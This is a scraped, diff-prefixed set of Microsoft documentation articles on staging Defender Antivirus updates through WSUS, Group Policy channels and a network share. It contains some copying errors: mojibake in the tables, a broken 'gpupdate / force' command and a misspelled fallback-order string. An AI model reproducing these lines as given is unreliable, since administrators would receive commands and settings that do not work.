-#### To determine if updates are synchronized
-
-1. In the **Update Services** console, go > **Update Services** > **YR2K19** > **Updates** > **All Updates**.
-1. In **Approval**, select **Any Except Declined**, and the select **Refresh**.
-
- The **All Updates** view lists "Platform Updates" and "Security Intelligence Updates" (also known as signatures/definitions). For example, KB4052623 platform updates. KB4052623 platform update is shown in the following figure:
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-report-view-signature-platform-updates.png" alt-text="Screenshot that shows a screen capture of the results from a Microsoft Update Catalog search for KB4052623 platform updates." lightbox="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-report-view-signature-platform-updates.png":::
-
-1. Select **KB4052623** version **4.18.2302.7** to see the synchronization status.
-
- > [!NOTE]
- > For the "Security Intelligence Updates", please see [Appendix A](microsoft-defender-antivirus-ring-deployment-group-policy-wsus-appendices.md).
- > For the "Engine Updates", please see [Appendix B](microsoft-defender-antivirus-ring-deployment-group-policy-wsus-appendices.md).
- > For the "Platform Updates", please see [Appendix C](microsoft-defender-antivirus-ring-deployment-group-policy-wsus-appendices.md).
-
-#### Approve and deploy updates in WSUS
-
-1. In the **Update Services** console, go > **Update Services** > **YR2K19** > **Computers** > **Options**. The **Options** window opens
-1. Select **Automatic Approvals** to launch the **Automatic Approvals** configuration wizard.
-1. In **Automatic Approvals** page, on the **Update Rules** tab, select **OK**.
-1. On the **Add Rule** page, is **Step 1**, select **When an update is in a specific classification** and **When an update is in a specific product**.
-1. In **Choose Products**, scroll to **Forefront**, and then select **Forefront Client Security**. Scroll to **Windows**, and then select **Microsoft Defender Antivirus**, and then select **OK**. The workflow returns you to the **Add Rule** page.
-1. On the **Add Rule** page, in **Step 1: Select Properties**, ensure the following are selected:
- - **When an update is in a specific classification**
- - **When an updates is in a specific product**
- - **Set a deadline for the approval**
-
- In **Step 2: Edit the properties**:
- - In **When an update is in**, ensure **Forefront Client Security, System Center Endpoint Protection, Microsoft Defender Antivirus** are listed.
- - In **Set a deadline for**, select **The same day as the approval at 5:00 AM**.
-
- In **Step 3: Specify a name**, type a name for your rule. For example, type _Microsoft Defender Antivirus updates_. These settings are shown in the following figure:
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-updates-add-rule.png" alt-text="Screenshot that shows a screen capture of an example name for a rule." lightbox="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-updates-add-rule.png":::
-
-1. Select **OK**. The work flow returns to the **Update Rules** page. Select your new rule, For example, select **Microsoft Defender Antivirus updates**.
-1. In **Rule Properties**, verify the information is correct, and then select **OK**.
-
-#### Define the order of sources for downloading security intelligence updates
-
-1. On your Group Policy management computer, open the **Group Policy Management Console**, right-click the _Group Policy Object_ you want to configure and select **Edit**.
-
-1. In the **Group Policy Management Editor** go to **Computer configuration**, select **Policies**, then select **Administrative templates**.
-
-1. Expand the tree to **Windows components** > **Windows Defender** > **Signature updates**.
-
- - Double-click the **Define the order of sources for downloading security intelligence updates** setting and set the option to **Enabled**.
-
- - In **Options**, type _InternalDefinitionUpdateServer_, and then select **OK**. The configured **Define the order of sources for downloading security intelligence updates** page is shown in the following figure.
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-download-order.png" alt-text="Screenshot that shows a screen capture of how to define the order of sources for downloading security intelligence updates." lightbox="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-download-order.png":::
-
-For more information, see [Manage how and where Microsoft Defender Antivirus receives updates](manage-protection-updates-microsoft-defender-antivirus.md).
-
-## See also
-
-[Microsoft Defender Antivirus ring deployment](microsoft-defender-antivirus-ring-deployment.md)
-
-[Microsoft Defender Antivirus production ring deployment using Group Policy and Windows Server Update Services](microsoft-defender-antivirus-production-ring-deployment-group-policy-wsus.md)
security Microsoft Defender Antivirus Production Ring Deployment Group Policy Wsus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-production-ring-deployment-group-policy-wsus.md
- Title: Production ring deployment using Group Policy and Windows Server Update Services
-description: Microsoft Defender Antivirus is an enterprise endpoint security platform that helps defend against advanced persistent threats. This article provides information about how to use a ring deployment method to update your Microsoft Defender Antivirus production clients using Group Policy and Windows Server Update Services (WSUS).
------- m365-security-- tier1-- mde-ngp--- Previously updated : 07/21/2023--
-# Microsoft Defender Antivirus production ring deployment using Group Policy and Windows Server Update Services
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- Microsoft Defender Antivirus-
-**Platforms**
--- Windows-- Windows Server-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats.
-
-> [!TIP]
-> Microsoft Defender for Endpoint is available in two plans, Defender for Endpoint Plan 1 and Plan 2. A new Microsoft Defender Vulnerability Management add-on is now available for Plan 2.
-
-## Before you begin
-
-This article assumes that you have experience with Windows Server Update Services (WSUS) and/or already have WSUS installed. If you aren't already familiar with WSUS, see the following articles for important configuration details:
--- [Configure WSUS](/windows-server/administration/windows-server-update-services/deploy/2-configure-wsus) - Applies to: Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012)-- [Configure Windows Server Update Services (WSUS) in Analytics Platform System][/sql/analytics-platform-system/configure-windows-server-update-services-wsus.md] - Analytics Platform System-
-## Setting up the production environment
-
-This section provides information about setting up the production environment using Group Policy and Windows Server Update Services (WSUS).
--
-> [!NOTE]
-> Security intelligence update (SIU) is equivalent to signature updates, which is the same as definition updates.
-
-1. On the left pane of **Server Manager**, select **Dashboard** > **Tools** > **Windows Server Update Services**.
-
- > [!NOTE]
- > If the **Complete WSUS Installation** dialog box appears, select **Run**. In the **Complete WSUS Installation** dialog box, select **Close when the installation successfully finishes**.
-
-1. The **WSUS Configuration Wizard** opens. On the **Before you Begin** page, review the information, and then select **Next**.
-
-1. Read the instructions on the **Join the Microsoft Update Improvement Program** page. Keep the default selection if you want to participate in the program, or clear the checkbox if you don't. Then select **Next**.
-
-1. On the **Choose Upstream Server** page, select **Synchronize from another Windows Server Update Services server**.
-
- - In **Server name**, enter the server name. For example, type _YR2K19_.
- - In **Port number** enter the port on which this server communicates with the upstream server. For example, type _8530_.
-
- This is shown in the following figure.
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-production-update-service-upstream.png" alt-text="Screenshot that shows a screen capture of the Update Services snap-in console, Choose Upstream Server page." lightbox="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-production-update-service-upstream.png":::
-
-1. Select **Next**.
-
- An autonomous downstream server, like a replica server, also uses another WSUS server as its master repository, but allows for individual approvals for updates different from approvals of the master. The autonomous server:
-
- - Allows flexibility in creating computer groups
- - Doesn't have to be in the same Active Directory forest as the master
-
-1. (Optional, depending on configuration) On the **Specify Proxy Server** page, select the **Use a proxy server when synchronizing** checkbox. Then enter the proxy server name and port number (port 80 by default) in the corresponding boxes.
-
- > [!IMPORTANT]
- > You must complete this step if you identified that WSUS needs a proxy server to have internet access.
-
- - If you want to connect to the proxy server by using specific user credentials, select the **Use user credentials to connect to the proxy server** checkbox. Then enter the user name, domain, and password of the user in the corresponding boxes.
- - If you want to enable basic authentication for the user who is connecting to the proxy server, select the **Allow basic authentication (password is sent in cleartext)** checkbox.
-
- Select **Next**.
-
-1. On the **Connect to Upstream Server** page, select **start Connecting**. When WSUS connects to the server, select **Next**.
-
-1. On the **Choose Languages** page, you can select the languages from which WSUS receives updates: **all languages** or a **subset of languages**. Selecting a subset of languages saves disk space, but it's important to choose all the languages that all the clients need on this WSUS server.
-
- If you choose to get updates only for specific languages, select **Download updates only in these languages**, and then select the languages for which you want updates. Otherwise, leave the default selection.
-
- > [!WARNING]
- > If you select the option **Download updates only in these languages**, and the server has a downstream WSUS server connected to it, selecting this option will force the downstream server to also use only the selected languages.
-
- After you select the language options for your deployment, select **Next**.
-
-1. The **Set Sync Schedule** page opens. (The **Choose Products** and **Choose Classifications** pages are grayed out and can't be configured).
-
- - Select **Synchronize automatically**, the WSUS server synchronizes at set intervals.
- - In **First synchronization** specify a time for the first synchronization. For example, select _5:00:00 PM._
- - In **Synchronizations per day**, specify the number of times you want synchronizations to occur. For example, select _1_, and then select **Next**.
-
-1. On the **Finished** page, select **Next**.
-
-1. On the **What's next** page, select **Next** to finish.
-
-#### Define the order of sources for downloading security intelligence updates
-
-1. On your Group Policy management computer, open the **Group Policy Management Console**, right-click the _Group Policy Object_ you want to configure and select **Edit**.
-
-1. In the **Group Policy Management Editor** go to **Computer configuration**, select **Policies**, then select **Administrative templates**.
-
-1. Expand the tree to **Windows components** > **Windows Defender** > **Signature updates**.
-
- - Double-click the **Define the order of sources for downloading security intelligence updates** setting and set the option to **Enabled**.
-
- - In **Options**, type _InternalDefinitionUpdateServer_, and then select **OK**. The configured **Define the order of sources for downloading security intelligence updates** page is shown in the following figure.
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-download-order.png" alt-text="Screenshot that shows a screen capture of the results from a Microsoft Update Catalog search for KB4052623." lightbox="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-download-order.png":::
-
-1. In **Define the order of sources for downloading security intelligence updates**, select **Enabled**. In **Options**, enter the order of sources for downloading security intelligence updates. For example, type _InternalDefinitionUpdateServer_.
-
- ## If you encounter problems
-
-If you encounter problems with your deployment, create or append your Microsoft Defender Antivirus policy:
-
-1. In [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn265969(v=ws.11)) (GPMC, GPMC.msc), create or append to your Microsoft Defender Antivirus policy using the following setting:
-
- Go to **Computer Configuration** > **Policies** > **Administrative Templates** > **Windows Components** > **Microsoft Defender Antivirus** > (administrator-defined) _PolicySettingName_. For example, _MDAV\_Settings\_Production_, right-click, and then select **Edit**. **Edit** for **MDAV\_Settings\_Production** is shown in the following figure:
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-policy-edit.png" alt-text="Screenshot that shows a screen capture of the administrator-defined Microsoft Defender Antivirus policy Edit option." lightbox="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-policy-edit.png":::
-
-1. Select **Define the order of sources for downloading security intelligence updates**.
-
-1. Select the radio button named **Enabled**.
-
-1. Under **Options**, change the entry to _FileShares_, select **Apply**, and then select **OK**. This change is shown in the following figure:
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-policy-define-order.png" alt-text="Screenshot that shows a screen capture of the Define the order of sources for downloading security intelligence updates page." lightbox="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-policy-define-order.png":::
-
-1. Select **Define the order of sources for downloading security intelligence updates**.
-
-1. Select the radio button named **Disabled**, select **Apply**, and then select **OK**. The disabled option is shown in the following figure:
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-policy-disabled.png" alt-text="Screenshot that shows a screen capture of the Define the order of sources for downloading security intelligence updates page with Security Intelligence updates disabled." lightbox="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-policy-disabled.png":::
-
-1. The change is active when Group Policy updates. There are two methods to refresh Group Policy:
-
- - From the command line, run the Group Policy update command. For example, run `gpupdate / force`. For more information, see [gpupdate](/windows-server/administration/windows-commands/gpupdate)
- - Wait for Group Policy to automatically refresh. Group Policy refreshes every 90 minutes +/- 30 minutes.
-
- If you have multiple forests/domains, force replication or wait 10-15 minutes. Then force a Group Policy Update from the Group Policy Management Console.
-
- - Right-click on an organizational unit (OU) that contains the machines (for example, Desktops), select **Group Policy Update**. This UI command is the equivalent of doing a gpupdate.exe /force on every machine in that OU. The feature to force Group Policy to refresh is shown in the following figure:
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-management-console.png" alt-text="Screenshot that shows a screen capture of the Group Policy Management console, initiating a forced update." lightbox="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-management-console.png":::
-
-1. After the issue is resolved, set the **Signature Update Fallback Order** back to the original setting. `InternalDefinitionUpdateServer|MicrosoftUpdateServer|MMPC|FileShare`.
-
- See also:
-
security Microsoft Defender Antivirus Ring Deployment Group Policy Microsoft Update https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-ring-deployment-group-policy-microsoft-update.md
- Title: Production ring deployment using Group Policy and Microsoft Update (MU)
-description: Microsoft Defender Antivirus is an enterprise endpoint security platform that helps defend against advanced persistent threats. This article provides information about how to use a ring deployment method to update your Microsoft Defender Antivirus clients using Group Policy and Microsoft Update (MU).
------- m365-security-- tier1-- mde-ngp--- Previously updated : 07/21/2023--
-# Microsoft Defender Antivirus production ring deployment using Group Policy and Microsoft Updates
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- Microsoft Defender Antivirus-
-**Platforms**
--- Windows-- Windows Server-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats.
-
-> [!TIP]
-> Microsoft Defender for Endpoint is available in two plans, Defender for Endpoint Plan 1 and Plan 2. A new Microsoft Defender Vulnerability Management add-on is now available for Plan 2.
-
-## Prerequisites
-
-Review the _read me_ article at [Readme](https://github.com/microsoft/defender-updatecontrols/blob/main/README.md)
-https://github.com/microsoft/defender-updatecontrols/blob/main/README.md
-
-Download the latest Windows Defender .admx and .adml
--- [WindowsDefender.admx](https://github.com/microsoft/defender-updatecontrols/blob/main/WindowsDefender.admx) -- [WindowsDefender.adml](https://github.com/microsoft/defender-updatecontrols/blob/main/WindowsDefender.adml)-
-Copy the latest .admx and .adml to the Domain Controller [Central Store](/troubleshoot/windows-client/group-policy/create-and-manage-central-store#the-central-store).
-
-## Setting up the Pilot (UAT/Test/QA) environment
-
-This section describes the process for setting up the pilot UAT / Test / QA environment.
--
-> [!NOTE]
-> Security intelligence update (SIU) is equivalent to signature updates, which is the same as definition updates.
-
- On about 10-500 Windows and/or Windows Server systems, depending on how many total systems that you all have, perform the following tasks.
-
- > [!NOTE]
- > If you have a Citrix environment, include at least 1 Citrix VM (non-persistent) and/or (persistent)
-
-In [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn265969(v=ws.11)) (GPMC, GPMC.msc), create or append to your Microsoft Defender Antivirus policy.
-
-1. Edit your Microsoft Defender Antivirus policy. For example, edit _MDAV\_Settings\_Pilot_. Go to **Computer Configuration** > **Policies** > **Administrative Templates** > **Windows Components** > **Microsoft Defender Antivirus**. There are three related options:
-
- | Feature | Recommendation for the pilot systems |
- |:|:|
- | Select the channel for Microsoft Defender daily **Security Intelligence updates** | Current Channel (Staged) |
- | Select the channel for Microsoft Defender monthly **Engine updates** | Beta Channel |
- | Select the channel for Microsoft Defender monthly **Platform updates** | Beta Channel |
-
- The three options are shown in the following figure.
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-gp-microsoft-defender-antivirus-channels.png" alt-text="Screenshot that shows a screen capture of the pilot Computer Configuration > Policies > Administrative Templates > Windows Components > Microsoft Defender Antivirus update channels." lightbox="media/microsoft-defender-antivirus-deploy-ring-gp-microsoft-defender-antivirus-channels.png":::
-
- For more information, see [Manage the gradual rollout process for Microsoft Defender updates](manage-gradual-rollout.md)
-
-1. Go to **Computer Configuration** > **Policies** > **Administrative Templates** > **Windows Components** > **Microsoft Defender Antivirus**.
-
-1. For _intelligence_ updates, double-click **Select the channel for Microsoft Defender monthly intelligence updates**.
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-gp-microsoft-defender-antivirus-channel-staged.png" alt-text="Screenshot that shows a screen capture of the Select the channel for Microsoft Defender monthly intelligence updates page with Enabled and Current Channel (Staged) selected." lightbox="media/microsoft-defender-antivirus-deploy-ring-gp-microsoft-defender-antivirus-channel-staged.png":::
-
-1. On the **Select the channel for Microsoft Defender monthly intelligence updates** page, select **Enabled**, and in **Options**, select **Current Channel (Staged)**.
-
-1. Select **Apply**, and then select **OK**.
-
-1. Go to **Computer Configuration** > **Policies** > **Administrative Templates** > **Windows Components** > **Microsoft Defender Antivirus**.
-
-1. For _engine_ updates, double-click **Select the channel for Microsoft Defender monthly engine updates**.
-
-1. On the **Select the channel for Microsoft Defender monthly Platform updates** page, select **Enabled**, and in **Options**, select **Beta Channel**.
-
-1. Select **Apply**, and then select **OK**.
-
-1. For _platform_ updates, double-click **Select the channel for Microsoft Defender monthly Platform updates**.
-
-1. On the **Select the channel for Microsoft Defender monthly Platform updates** page, select **Enabled**, and in **Options**, select **Beta Channel**. These two settings are shown in the following figure:
-
-1. Select **Apply**, and then select **OK**.
-
-### Related articles
--- [Antivirus profiles - Devices managed by Microsoft Intune](/mem/intune/protect/endpoint-security-antivirus-policy#antivirus-profiles)-- [Use Endpoint security Antivirus policy to manage Microsoft Defender update behavior (Preview)](/mem/intune/fundamentals/whats-new#use-endpoint-security-antivirus-policy-to-manage-microsoft-defender-update-behavior-preview)-- [Manage the gradual rollout process for Microsoft Defender updates](manage-gradual-rollout.md#manage-the-gradual-rollout-process-for-microsoft-defender-updates)-
-## Setting up the production environment
-
-1. In [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn265969(v=ws.11)) (GPMC, GPMC.msc), go to **Computer Configuration** > **Policies** > **Administrative Templates** > **Windows Components** > **Microsoft Defender Antivirus**.
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-gp-microsoft-defender-antivirus-channels.png" alt-text="Screenshot that shows a screen capture of the production Computer Configuration > Policies > Administrative Templates > Windows Components > Microsoft Defender Antivirus update channels." lightbox="media/microsoft-defender-antivirus-deploy-ring-gp-microsoft-defender-antivirus-channels.png":::
-
-1. Set the three policies as follows:
-
- | Feature | Recommendation for the production systems | Remarks |
- |:|:|
- | Select the channel for Microsoft Defender daily **Security Intelligence updates** | Current Channel (Broad) | This setting provides you with 3 hours of time to find an FP and prevent the production systems from getting an incompatible signature update. |
- | Select the channel for Microsoft Defender monthly **Engine updates** | Critical ΓÇô Time delay | Updates are delayed by two days. |
- | Select the channel for Microsoft Defender monthly **Platform updates** | Critical ΓÇô Time delay | Updates are delayed by two days. |
-
-1. For _intelligence_ updates, double-click **Select the channel for Microsoft Defender monthly intelligence updates**.
-
-1. On the **Select the channel for Microsoft Defender monthly intelligence updates** page, select **Enabled**, and in **Options**, select **Current Channel (Broad)**.
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-gp-microsoft-defender-antivirus-channel-staged.png" alt-text="Screenshot that shows a screen capture of the Select the channel for Microsoft Defender monthly intelligence updates page with Enabled and Current Channel (Staged) selected." lightbox="media/microsoft-defender-antivirus-deploy-ring-gp-microsoft-defender-antivirus-channel-staged.png":::
-
-1. Select **Apply**, and then select **OK**.
-
-1. For _engine_ updates, double-click **Select the channel for Microsoft Defender monthly engine updates**.
-
-1. On the **Select the channel for Microsoft Defender monthly Platform updates** page, select **Enabled**, and in **Options**, select **Critical ΓÇô Time delay**.
-
-1. Select **Apply**, and then select **OK**.
-
-1. For _platform_ updates, double-click **Select the channel for Microsoft Defender monthly Platform updates**.
-
-1. On the **Select the channel for Microsoft Defender monthly Platform updates** page, select **Enabled**, and in **Options**, select **Critical ΓÇô Time delay**.
-
-1. Select **Apply**, and then select **OK**.
-
-## If you encounter problems
-
-If you encounter problems with your deployment, create or append your Microsoft Defender Antivirus policy:
-
-1. In [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn265969(v=ws.11)) (GPMC, GPMC.msc), create or append to your Microsoft Defender Antivirus policy using the following setting:
-
- Go to **Computer Configuration** > **Policies** > **Administrative Templates** > **Windows Components** > **Microsoft Defender Antivirus** > (administrator-defined) _PolicySettingName_. For example, _MDAV\_Settings\_Production_, right-click, and then select **Edit**. **Edit** for **MDAV\_Settings\_Production** is shown in the following figure:
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-policy-edit.png" alt-text="Screenshot that shows a screen capture of the administrator-defined Microsoft Defender Antivirus policy Edit option." lightbox="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-policy-edit.png":::
-
-1. Select **Define the order of sources for downloading security intelligence updates**.
-
-1. Select the radio button named **Enabled**.
-
-1. Under **Options:**, change the entry to _FileShares_, select **Apply**, and then select **OK**. This change is shown in the following figure:
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-policy-define-order.png" alt-text="Screenshot that shows a screen capture of the Define the order of sources for downloading security intelligence updates page." lightbox="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-policy-define-order.png":::
-
-1. Select **Define the order of sources for downloading security intelligence updates**.
-
-1. Select the radio button named **Disabled**, select **Apply**, and then select **OK**. The disabled option is shown in the following figure:
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-policy-disabled.png" alt-text="Screenshot that shows a screen capture of the Define the order of sources for downloading security intelligence updates page with Security Intelligence updates disabled." lightbox="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-policy-disabled.png":::
-
-1. The change is active when Group Policy updates. There are two methods to refresh Group Policy:
-
- - From the command line, run the Group Policy update command. For example, run `gpupdate / force`. For more information, see [gpupdate](/windows-server/administration/windows-commands/gpupdate)
- - Wait for Group Policy to automatically refresh. Group Policy refreshes every 90 minutes +/- 30 minutes.
-
- If you have multiple forests/domains, force replication or wait 10-15 minutes. Then force a Group Policy Update from the Group Policy Management Console.
-
- - Right-click on an organizational unit (OU) that contains the machines (for example, Desktops), select **Group Policy Update**. This UI command is the equivalent of doing a gpupdate.exe /force on every machine in that OU. The feature to force Group Policy to refresh is shown in the following figure:
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-management-console.png" alt-text="Screenshot that shows a screen capture of the Group Policy Management console, initiating a forced update." lightbox="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-management-console.png":::
-
-1. After the issue is resolved, set the **Signature Update Fallback Order** back to the original setting. `InternalDefinitionUpdateServder|MicrosoftUpdateServer|MMPC|FileShare`.
-
-## See also
--- [Antivirus profiles - Devices managed by Microsoft Intune](/mem/intune/protect/endpoint-security-antivirus-policy#antivirus-profiles)-- [Use Endpoint security Antivirus policy to manage Microsoft Defender update behavior (Preview)](/mem/intune/fundamentals/whats-new#use-endpoint-security-antivirus-policy-to-manage-microsoft-defender-update-behavior-preview)-- [Manage the gradual rollout process for Microsoft Defender updates](manage-gradual-rollout.md#manage-the-gradual-rollout-process-for-microsoft-defender-updates)-- [Microsoft Defender Antivirus ring deployment overview](microsoft-defender-antivirus-ring-deployment.md#ring-deployment-overview)
security Microsoft Defender Antivirus Ring Deployment Group Policy Network Share https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-ring-deployment-group-policy-network-share.md
- Title: Production ring deployment using Group Policy and network share
-description: Microsoft Defender Antivirus is an enterprise endpoint security platform that helps defend against advanced persistent threats. This article provides information about how to use a ring deployment method to update your Microsoft Defender Antivirus clients using Group Policy over a network share.
------- m365-security-- tier1--- Previously updated : 07/21/2023--
-# Microsoft Defender Antivirus production ring deployment using Group Policy and network share
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- Microsoft Defender Antivirus-
-**Platforms**
--- Windows-- Windows Server-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats.
-
-> [!TIP]
-> Microsoft Defender for Endpoint is available in two plans, Defender for Endpoint Plan 1 and Plan 2. A new Microsoft Defender Vulnerability Management add-on is now available for Plan 2.
-
-## Introduction
-
-This article describes how to deploy Microsoft Defender Antivirus in rings using Group Policy and Network share (also known as UNC path, SMB, CIFS).
-
-## Prerequisites
-
-Review the _read me_ article at [Readme](https://github.com/microsoft/defender-updatecontrols/blob/main/README.md)
-
-1. Download the latest Windows Defender .admx and .adml.
-
- - [WindowsDefender.admx](https://github.com/microsoft/defender-updatecontrols/blob/main/WindowsDefender.admx)
- - [WindowsDefender.adml](https://github.com/microsoft/defender-updatecontrols/blob/main/WindowsDefender.adml)
-
-1. Copy the latest .admx and .adml to the [Domain Controller Central Store](/troubleshoot/windows-client/group-policy/create-and-manage-central-store#the-central-store).
-
-1. [Create a UNC share for security intelligence and platform updates](manage-protection-updates-microsoft-defender-antivirus.md#create-a-unc-share-for-security-intelligence-and-platform-updates)
-
-## Setting up the pilot environment
-
-This section describes the process for setting up the pilot UAT / Test / QA environment. On about 10-500* Windows and/or Windows Server systems, depending on how many total systems that you all have.
--
-> [!NOTE]
-> Security intelligence update (SIU) is equivalent to signature updates, which is the same as definition updates.
-
-### Create a UNC share for security intelligence and platform updates
-
-Set up a network file share (UNC/mapped drive) to download security intelligence and platform updates from the MMPC site by using a scheduled task.
-
-1. On the system on which you want to provision the share and download the updates, create a folder to which you will save the script.
-
- ```console
- Start, CMD (Run as admin)
- MD C:\Tool\PS-Scripts\
- ```
-
-2. Create the folder to which you will save the signature updates.
-
- ```console
- MD C:\Temp\TempSigs\x64
- MD C:\Temp\TempSigs\x86
- ```
-
-3. Set up a PowerShell script, `CopySignatures.ps1`
-
- Copy-Item -Path "\\SourceServer\Sourcefolder" -Destination "\\TargetServer\Targetfolder"
-
-4. Use the command line to set up the scheduled task.
-
- > [!NOTE]
- > There are two types of updates: full and delta.
-
- - For x64 delta:
-
- ```powershell
- Powershell (Run as admin)
-
- C:\Tool\PS-Scripts\
-
- ".\SignatureDownloadCustomTask.ps1 -action create -arch x64 -isDelta $true -destDir C:\Temp\TempSigs\x64 -scriptPath C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1 -daysInterval 1"
- ```
-
- - For x64 full:
-
- ```powershell
- Powershell (Run as admin)
-
- C:\Tool\PS-Scripts\
-
- ".\SignatureDownloadCustomTask.ps1 -action create -arch x64 -isDelta $false -destDir C:\Temp\TempSigs\x64 -scriptPath C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1 -daysInterval 1"
- ```
-
- - For x86 delta:
-
- ```powershell
- Powershell (Run as admin)
-
- C:\Tool\PS-Scripts\
-
- ".\SignatureDownloadCustomTask.ps1 -action create -arch x86 -isDelta $true -destDir C:\Temp\TempSigs\x86 -scriptPath C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1 -daysInterval 1"
- ```
-
- - For x86 full:
-
- ```powershell
- Powershell (Run as admin)
-
- C:\Tool\PS-Scripts\
-
- ".\SignatureDownloadCustomTask.ps1 -action create -arch x86 -isDelta $false -destDir C:\Temp\TempSigs\x86 -scriptPath C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1 -daysInterval 1"
- ```
-
- > [!NOTE]
- > When the scheduled tasks are created, you can find these in the Task Scheduler under `Microsoft\Windows\Windows Defender`.
-
-5. Run each task manually and verify that you have data (`mpam-d.exe`, `mpam-fe.exe`, and `nis_full.exe`) in the following folders (you might have chosen different locations):
-
- - `C:\Temp\TempSigs\x86`
- - `C:\Temp\TempSigs\x64`
-
- If the scheduled task fails, run the following commands:
-
- ```console
- C:\windows\system32\windowspowershell\v1.0\powershell.exe -NoProfile -executionpolicy allsigned -command "&\"C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1\" -action run -arch x64 -isDelta $False -destDir C:\Temp\TempSigs\x64"
-
- C:\windows\system32\windowspowershell\v1.0\powershell.exe -NoProfile -executionpolicy allsigned -command "&\"C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1\" -action run -arch x64 -isDelta $True -destDir C:\Temp\TempSigs\x64"
-
- C:\windows\system32\windowspowershell\v1.0\powershell.exe -NoProfile -executionpolicy allsigned -command "&\"C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1\" -action run -arch x86 -isDelta $False -destDir C:\Temp\TempSigs\x86"
-
- C:\windows\system32\windowspowershell\v1.0\powershell.exe -NoProfile -executionpolicy allsigned -command "&\"C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1\" -action run -arch x86 -isDelta $True -destDir C:\Temp\TempSigs\x86"
- ```
-
- > [!NOTE]
- > Issues could also be due to execution policy.
-
-6. Create a share pointing to `C:\Temp\TempSigs` (e.g., `\\server\updates`).
-
- > [!NOTE]
